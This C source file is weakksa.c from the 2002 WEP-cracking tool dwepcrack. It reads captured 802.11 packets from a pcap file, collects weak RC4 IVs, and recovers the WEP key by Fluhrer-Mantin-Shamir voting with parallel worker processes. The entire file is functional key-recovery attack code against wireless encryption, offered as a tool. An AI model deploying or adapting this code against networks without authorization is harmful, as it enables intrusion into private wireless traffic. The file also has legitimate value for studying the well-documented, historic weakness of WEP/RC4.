/*
 * dwepcrack v0.4 [weakksa.c]
 * by h1kari - (c) Dachb0den Labs 2002
 */

/*
 * Copyright (c) 2002 Dachb0den Labs.
 *      David Hulton <h1kari@dachb0den.com>.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by David Hulton.
 * 4. Neither the name of the author nor the names of any co-contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY David Hulton AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL David Hulton OR THE VOICES IN HIS HEAD
 * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
 * THE POSSIBILITY OF SUCH DAMAGE.
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <errno.h>
#include <pcap.h>

#include "dwepcrack.h"

struct samples_s {
  u_char iv[IV_SIZE];
  u_char byte;
};

struct samples_table_s {
  struct samples_s *s;
  int len;
  int size;
};

static int trycnt = 0;
static int count = 0;
static struct samples_table_s samples[HIGH_KEY_SIZE];

/*
 * open up the logfile and loop through to figure out what keys we've
 * recovered.
 */
#define SETBIT(x, bit) x[bit / 8] |= (1 << (bit % 8))
#define BITSET(x, bit) x[bit / 8] & (1 << (bit % 8))
#define N 256
#define PROBABLE 60
void
weakksacrack(char *filename)
{
  int i, j, k, probable = 1, samples_size[] = SAMPLES_SIZE;
  int a, b, x, y, z;
  char errbuf[PCAP_ERRBUF_SIZE];
  char sample_check[N][N][N / 8];
  u_char *pkt, *iv, B, W[WEP_KEY_SIZE];
  struct pcap_pkthdr h;
  struct wi_rx_frame *wi_h;

  for(i = 0; i < WEP_KEY_SIZE; i++)
  {
    samples[i].len = 0;
    samples[i].size = samples_size[i];
    samples[i].s = (struct samples_s *)malloc(
     sizeof(struct samples_s) * samples[i].size);
    memset((char *)samples[i].s, 0,
     sizeof(struct samples_s) * samples[i].size);
  }

  for(i = 0; i < N; i++)
    for(j = 0; j < N; j++)
      for(k = 0; k < (N / 8); k++)
        sample_check[i][j][k] = 0;

  small_len = -1;
  verify_len = -1;

  if((p = pcap_open_offline(filename, errbuf)) == NULL)
  {
    fprintf(stderr, "error: unable to open pcap output file: %s\n", errbuf);
    exit(2);
  }

  printf("reading in captured ivs, snap headers, and samples... ");
  fflush(stdout);
  while(1)
  {
    if((pkt = (u_char *)pcap_next(p, &h)) == NULL)
      break;

    count++;
    wi_h = (struct wi_rx_frame *)pkt;
    iv = (u_char *)pkt + IV_OFF;

    /*
     * double check to make sure the packet is proper... also allows us to
     * use other pcap dump files to try and brute force wep (I dunno why
     * someone would have a capture file that frickin big, but who knows!)
     */
    if(!(le16toh(wi_h->wi_status) & WI_STAT_BADCRC) &&
     (le16toh(wi_h->wi_frame_ctl) & WI_FCTL_FTYPE) == WI_FTYPE_DATA)
    {

      if(le16toh(wi_h->wi_dat_len) > MAX_PKT_SIZE ||
       le16toh(wi_h->wi_dat_len) < MIN_PKT_SIZE)
        continue;

      if(small_len > 0 && verify_len < 0 && memcmp(small_pkt, pkt + IV_OFF,
       MIN(small_len, le16toh(wi_h->wi_dat_len))) != 0)
      {
        verify_len = le16toh(wi_h->wi_dat_len);
        memcpy(verify_pkt, pkt + IV_OFF, verify_len);
      }
      else if((le16toh(wi_h->wi_dat_len) < small_len || small_len < 0))
      {
        small_len = le16toh(wi_h->wi_dat_len);
        memcpy(small_pkt, pkt + IV_OFF, small_len);
      }

      x = iv[0];
      y = iv[1];
      z = iv[2];

      a = (x + y) % N;
      b = AMOD((x + y) - z, N);

      for(B = 0; B < WEP_KEY_SIZE; B++)
      {
        /*
         * test to see if this key would apply to any of the bytes that
         * we're trying to crack.
         */
        if((((0 <= a && a < B) ||
         (a == B && b == (B + 1) * 2)) &&
         (B % 2 ? a != (B + 1) / 2 : 1)) ||
         (a == B + 1 && (B == 0 ? b == (B + 1) * 2 : 1)) ||
         (x == B + 3 && y == N - 1) ||
         (B != 0 && !(B % 2) ? (x == 1 && y == (B / 2) + 1) ||
         (x == (B / 2) + 2 && y == (N - 1) - x) : 0))
        {
          if(BITSET(sample_check[x][y], z))
            goto fail;
          SETBIT(sample_check[x][y], z);

//          for(j = 0; j < samples[B].len; j++)
//            if(memcmp(samples[B].s[j].iv, iv, IV_SIZE) == 0)
//              goto fail;

          memcpy(samples[B].s[samples[B].len].iv, iv, IV_SIZE);
          samples[B].s[samples[B].len++].byte = iv[4] ^ 0xaa;

          fail:
        }
      }
    }
  }
  printf("done\n");
  printf("total packets: %d\n\n", count);

  if(small_len == verify_len && memcmp(small_pkt, verify_pkt, small_len) == 0)
  {
    fprintf(stderr, "error: not enough packets to verify authenticity of "
     "crack. must have at least 2 packets\n");
    exit(2);
  }

  if(small_len < 0 || verify_pkt < 0)
  {
    fprintf(stderr, "error: unable to find a valid data packet in logfile\n");
    exit(2);
  }

  pcap_close(p);

  printf("calculating ksa probabilities...\n");
  for(i = 0; i < WEP_KEY_SIZE; i++)
  {
    if(samples[i].len < PROBABLE)
      probable = 0;

    printf(" %d: %d/%d keys %s\n", i, samples[i].len, samples[i].size,
     probable ? "" : "(!)");
  }

  if(!probable)
    printf("\n"
     "(!) insufficient ivs, must have > 60 for each key (!)\n"
     "(!) probability of success for each key with (!) < 0.5 (!)\n");

  printf("\nwarming up the grinder...\n");
  if(small_len < 0)
  {
    fprintf(stderr, "error: insufficient amount of packets to continue\n");
    exit(2);
  }

  wep_init(small_pkt, small_len, 1);

  putchar('\n');
  printf(PROGRESS);
  fflush(stdout);

  grindsamples(0, W);

  for(i = 0; i < WEP_KEY_SIZE; i++)
    free(samples[i].s);

  printf("\n\n");
}

/*
 * grind the samples using the algorithm described in
 * "Weaknesses in the Key Scheduling Algorithm of RC4" by Scott Fluhrer,
 * Itsik Mantin and Adi Shamir.
 *
 * KSA(K)
 *
 * Initialization:
 *   For i = 0 ... N - 1
 *     S[i] = i 
 *
 * Scrambling:
 *   For i = 0 ... N - 1
 *     j = j + S[i] + K[i mod l]
 *     Swap(S[i], S[l]);
 */
#define KEY_SIZE  (WEP_KEY_SIZE + IV_SIZE)
int
grindsamples(int B, u_char *W)
{
  register int i, j, x, max;
  int votes[N];
  u_char E, S[N];
  u_char K[WEP_KEY_SIZE + 3];

  memset((u_char *)votes, 0, N * sizeof(int));
  memcpy(K + IV_SIZE, W, B);

  for(x = 0; x < samples[B].len; x++)
  {
    memcpy(K, samples[B].s[x].iv, IV_SIZE);

    /* Setup the S set for {0,....,N - 1} */
    for(i = 0; i < N; i++)
      S[i] = i;

    /* Permutate ;-Q~ */
    for(i = 0, j = 0; i < B + 3; i++)
    {
      j = (j + S[i] + K[i % (B + 3)]) % N;
      SWAP(S[i], S[j]);
    }

    if(!(S[1] < B + 3 && (S[1] + S[S[1]]) % N == B + 3))
      continue;

    E = reversekey(samples[B].s[x].byte, B, j, S);

    /* if there's duplicates of X, Y, or Z, we've got e^-2 instead of e^-3 */
    if(S[1] == S[S[1]] || S[1] == S[(S[1] + S[S[1]]) % N] ||
     S[S[1]] == S[(S[1] + S[S[1]]) % N])
      votes[E] += 13;
    else
      votes[E] += 5;
  }


  for(x = 0, max = 0; x < N; x++)
  {
    if(votes[x] > max)
      max = votes[x];
  }

  /* loop through all the results within the fudge to compute the next key */
  if(B == 0 && jobs)
  {
    grindforkvotes(B, W, votes, max);
    return 0;
  }
  else if(grindvotes(B, W, votes, max, 0, -1) != -1)
    return 0;

  return -1;
}

/*
 * loop through all of the results within the fudge to compute the next key
 */
int
grindvotes(int B, u_char *W, int *votes, int max, int idx, int len)
{
  int i, j, k, f = fudge, cnt;

  /*
   * loop from the most probable votes down to the lowest based on the
   * specified fudge factor.
   */
  for(i = max; i > 0 && f >= 0; i--)
  {
    for(j = 0, k = 0, cnt = -1; j < N; j++)
      if(votes[j] == i)
      {
        cnt++;
        if(cnt < idx) continue;
        else if(len > 0 && cnt > len) return -1;

        W[B] = j;
        if(B == (WEP_KEY_SIZE - 1))
        {
          if((trycnt++ % 100) == 0)
          {
            putchar('.');
            fflush(stdout);
          }
          if(wep_try_verify_key(W, 1, verify_pkt, verify_len) != -1)
            return 0;
        }
        else if(grindsamples(B + 1, W) != -1)
          return 0;

        k++;
      }

    if(k) f--;
  }

  return -1;
}

/*
 * evenly divide the tasks for the first key to various child processes
 */
void
grindforkvotes(int B, u_char *W, int *votes, int max)
{
  u_int i, diff, top, idx, len;
  pid_t pid[jobs];

  signal(SIGCHLD, chld_handler);

  /* calculate the amount of times we will loop */
  for(i = 0, top = 0; i < N; i++)
    if(votes[i] >= MAX(max - fudge, 0) && votes[i] <= MAX(max, 1))
      top++;

  /* if there's not enough loops to for each job, drop the jobs down */
  if(top < jobs)
    jobs = top;

  diff = top / jobs;
  for(i = 0; i < jobs; i++)
  {
    if(!(pid[i] = fork()))
    {
      idx = diff * i;
      len = (i == jobs - 1 ? top : diff * (i + 1));

      exit(grindvotes(B, W, votes, max, idx, len));
    }
    else
      children++;
  }

  while(children > 0)
    sigpause(0);

  for(i = 0; i < jobs; i++)
    kill(pid[i], SIGKILL);
}


/*
 * K = S{-1 t}[Out] - j - S[B + 3]
 * resolve the prga outputted byte to the most probable key
 */
u_char
reversekey(u_char out, int B, int j, u_char *S)
{
  register int i;

  /*
   * S{-1 t}[X] denotes the location within the permutation S{t} where
   * the value X appears
   */
  for(i = 0; i < N; i++)
    if(S[i] == out)
    {
      out = i;
      break;
    } 

  return((out - j - S[B + 3]) % N);
}
